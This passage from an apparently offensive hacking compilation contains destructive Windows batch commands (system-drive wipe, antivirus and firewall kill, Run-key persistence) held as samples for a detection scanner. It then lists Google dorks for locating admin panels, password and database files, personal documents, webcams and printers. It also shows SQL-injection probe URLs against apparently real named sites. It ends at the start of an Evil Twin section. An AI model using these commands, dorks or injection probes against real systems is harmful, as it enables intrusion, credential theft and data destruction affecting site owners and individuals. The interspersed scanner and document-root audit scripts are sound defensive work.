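del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00""",
    "persistence": "reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv "
                   "ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f",
    "av-kill": """net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A spy*
tskill /A KAV*""",
    "spawn-loop": r"""@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top""",
    "benign": r"""@echo off
echo Nightly backup
xcopy C:\Data D:\Backup /E /Y
del C:\Temp\*.tmp /q
shutdown -s -t 60""",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(f"{name}: {scan(text) or 'no rule matched'}")
```

The same indicators are worth alerting on at run time, for example process-creation events where cmd.exe launches netsh, tskill or reg add against a Run key.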

Google Hacking

Google queries for locating various Web servers
“Apache/1.3.28 Server at” intitle:index.of
Apache 1.3.2
“Apache/2.0 Server at” intitle:index.of
Apache 2.0
“Apache/* Server at” intitle:index.of
any version of Apache
“Microsoft-IIS/4.0 Server at” intitle:index.of
Microsoft Internet Information Services 4.0
“Microsoft-IIS/5.0 Server at” intitle:index.of
Microsoft Internet Information Services 5.0
“Microsoft-IIS/6.0 Server at” intitle:index.of
Microsoft Internet Information Services 6.0
“Microsoft-IIS/* Server at” intitle:index.of
any version of Microsoft Internet Information Services
“Oracle HTTP Server/* Server at” intitle:index.of
any version of Oracle HTTP Server
“IBM _ HTTP _ Server/* * Server at” intitle:index.of
any version of IBM HTTP Server
“Netscape/* Server at” intitle:index.of
any version of Netscape Server
“Red Hat Secure/*” intitle:index.of
any version of the Red Hat Secure server
“HP Apache-based Web Server/*” intitle:index.of
any version of the HP server
Queries for discovering standard post-installation
intitle:”Test Page for Apache Installation” “You are free”
Apache 1.2.6
intitle:”Test Page for Apache Installation” “It worked!” “this Web site!”
Apache 1.3.0 – 1.3.9
intitle:”Test Page for Apache Installation” “Seeing this instead”
Apache 1.3.11 – 1.3.33, 2.0
intitle:”Test Page for the SSL/TLS-aware Apache Installation” “Hey, it worked!”
Apache SSL/TLS
intitle:”Test Page for the Apache Web Server on Red Hat Linux”
Apache on Red Hat
intitle:”Test Page for the Apache Http Server on Fedora Core”
Apache on Fedora
intitle:”Welcome to Your New Home Page!” Debian
Apache on Debian
intitle:”Welcome to IIS 4.0!”
IIS 4.0
intitle:”Welcome to Windows 2000 Internet Services”
IIS 5.0
intitle:”Welcome to Windows XP Server Internet Services”
IIS 6.0
Querying for application-generated system reports
“Generated by phpSystem”
operating system type and version, hardware configuration, logged users, open connections, free memory and disk space, mount points
“This summary was generated by wwwstat”
web server statistics, system file structure
“These statistics were produced by getstats”
web server statistics, system file structure
“This report was generated by WebLog”
web server statistics, system file structure
intext:”Tobias Oetiker” “traffic analysis”
system performance statistics as MRTG charts, network configuration
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
server version, operating system type, child process list, current connections
intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”
web server activity, lots of visitor information
intitle:”Multimon UPS status page”
UPS device performance statistics
intitle:”statistics of” “advanced web statistics”
web server statistics, visitor information
intitle:”System Statistics” +”System and Network Information Center”
system performance statistics as MRTG charts, hardware configuration, running services
intitle:”Usage Statistics for” “Generated by Webalizer”
web server statistics, visitor information, system file structure
intitle:”Web Server Statistics for ****”
web server statistics, visitor information
nurl:”/axs/ax-admin.pl” -script
web server statistics, visitor information
inurl:”/cricket/grapher.cgi”
MRTG charts of network interface performance
inurl:server-info “Apache Server Information”
web server version and configuration, operating system type, system file structure
“Output produced by SysWatch *”
operating system type and version, logged users, free memory and disk space, mount points, running processes, system logs



dork for finding admin page
admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
phpSQLiteAdmin/
server_admin_small/
database_administration/
system_administration/

Update Imp. Dorks.
Dork : "inurl:dettaglio.php?id="

Exploit :
www.victim.com/sito/dettaglio.php?id=[SQL]

Example :
http://www.cicloposse.com/dettaglio.php?id=61'
----------------------------------------------------------------------------------------------------------------
Dork: "inurl:prodotto.php?id="

Exploit: 
www.victim.com/prodotto.php?id=[SQL]

Example:http://www.poderimorini.com/en/prodotto.php?id=14'




sql injection dorks 

allinurl: "index php go buy"
allinurl: "index.php?go=sell"
allinurl: "index php go linkdir"
allinurl: "index.php?go=resource_center"
allinurl: "resource_center.html"
allinurl: "index.php?go=properties"
allinurl: "index.php?go=register"

Error message queries
"A syntax error has occurred" filetype:ihtml
Informix database errors, potentially containing function names, filenames, file structure information, pieces of SQL code and passwords
"Access denied for user" "Using password"
authorisation errors, potentially containing user names, function names, file structure information and pieces of SQL code
"The script whose uid is " "is not allowed to access"
access-related PHP errors, potentially containing filenames, function names and file structure information
"ORA-00921: unexpected end of SQL command"
Oracle database errors, potentially containing filenames, function names and file structure information
"error found handling the request" cocoon filetype:xml
Cocoon errors, potentially containing Cocoon version information, filenames, function names and file structure information
"Invision Power Board Database Error"
Invision Power Board bulletin board errors, potentially containing function names, filenames, file structure information and pieces of SQL code
"Warning: mysql_query()" "invalid query"
MySQL database errors, potentially containing user names, function names, filenames and file structure information
"Error Message : Error loading required libraries."
CGI script errors, potentially containing information about operating system and program versions, user names, filenames and file structure information
"#mysql dump" filetype:sql
MySQL database errors, potentially containing information about database structure and contents
Dork for locating passwords
"http://*:*@www" site
passwords for site, stored as the string "http://username:password@www…"
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
file backups, potentially containing user names and passwords
filetype:mdb inurl:"account|users|admin|administrators|passwd|password"
mdb files, potentially containing password information
intitle:"Index of" pwd.db
pwd.db files, potentially containing user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup
"Index of/" "Parent Directory" "WS_FTP.ini"
filetype:ini WS_FTP PWD
WS_FTP configuration files, potentially containing FTP server access passwords
ext:pwd inurl:(service|authors|administrators|users) "# -FrontPage-"
files containing Microsoft FrontPage passwords
filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )
files containing SQL code and passwords inserted into a database
intitle:index.of trillian.ini
configuration files for the Trillian IM
eggdrop filetype:user
user configuration files for the Eggdrop ircbot
filetype:conf slapd.conf
configuration files for OpenLDAP
inurl:"wvdial.conf" intext:"password"
configuration files for WV Dial
ext:ini eudora.ini
configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb
Microsoft Access files, potentially containing user account information
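
The queries above only find files that a site owner left inside a publicly served directory. As an added example (not part of the original post), this sketch audits your own document root for a few of those file names and content markers before a search engine indexes them. The rule table, function names and sample files are constructed for illustration.

```python
import fnmatch
import os
import tempfile

# (file-name glob, required content marker or None, what is exposed); constructed table.
RULES = [
    ("*htaccess*.bak", None, "backup of an access-control file"),
    ("*passwd*.bak", None, "backup of a password file"),
    ("ws_ftp.ini", None, "WS_FTP configuration, may hold FTP passwords"),
    ("pwd.db", None, "user names and encrypted passwords"),
    ("*.sql", b"#mysql dump", "MySQL dump with structure and contents"),
    ("wvdial.conf", b"password", "WvDial configuration with a password"),
]

def audit_docroot(root, max_bytes=65536):
    """Return sorted (relative path, reason) pairs for files matching a rule."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            for pattern, marker, reason in RULES:
                if not fnmatch.fnmatchcase(name.lower(), pattern):
                    continue
                if marker is not None:
                    with open(path, "rb") as fh:
                        if marker not in fh.read(max_bytes).lower():
                            continue
                findings.append((os.path.relpath(path, root), reason))
                break  # one finding per file is enough
    return sorted(findings)

def build_sample_docroot():
    """Write a small constructed document root to a temp dir and return it."""
    root = tempfile.mkdtemp(prefix="docroot-")
    samples = {
        "backup/.htaccess.bak": "AuthUserFile /constructed/path",
        "db/site.sql": "#MySQL dump 8.8\nINSERT INTO users VALUES (1);",
        "db/schema.sql": "CREATE TABLE t (id INT);",
        "ftp/WS_FTP.ini": "[_config_]",
    }
    for rel, text in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(text)
    return root

if __name__ == "__main__":
    print(audit_docroot(build_sample_docroot()))
```

Point `audit_docroot` at the directory your web server actually serves; anything it reports should be moved outside the document root or denied in the server configuration.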
Searching for personal data and confidential documents
filetype:xls inurl:"email.xls"
email.xls files, potentially containing contact information
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
CVs
"not for distribution"
confidential documents containing the confidential clause
buddylist.blt
AIM contacts list
intitle:index.of mystuff.xml
Trillian IM contacts list
filetype:ctt "msn"
MSN contacts list
filetype:QDF
QDF database files for the Quicken financial application
intitle:index.of finances.xls
finances.xls files, potentially containing information on bank accounts, financial summaries and credit card numbers
intitle:"Index Of" -inurl:maillog maillog size
maillog files, potentially containing e-mail
"Network Vulnerability Assessment Report"
"Host Vulnerability Summary Report"
filetype:pdf "Assessment Report"
"This file was generated by Nessus"
reports for network security scans, penetration tests etc.
dork for locating network devices
"Copyright (c) Tektronix, Inc." "printer status"
PhaserLink printers
inurl:"printer/main.html" intext:"settings"
Brother HL printers
intitle:"Dell Laser Printer" ews
Dell printers with EWS technology
intext:centreware inurl:status
Xerox Phaser 4500/6250/8200/8400 printers
inurl:hp/device/this.LCDispatcher
HP printers
intitle:liveapplet inurl:LvAppl
Canon Webview webcams
intitle:"EvoCam" inurl:"webcam.html"
Evocam webcams
inurl:"ViewerFrame?Mode="
Panasonic Network Camera webcams
(intext:"MOBOTIX M1" | intext:"MOBOTIX M10") intext:"Open Menu" Shift-Reload
Mobotix webcams
inurl:indexFrame.shtml Axis
Axis webcams
intitle:"my webcamXP server!" inurl:":8080"
webcams accessible via WebcamXP Server
allintitle:Brains, Corp. camera
webcams accessible via mmEye
intitle:"active webcam page"

Evil Twin attack

An Evil Twin attack is frequently carried out against wireless access points with malicious intent. This attack happens when...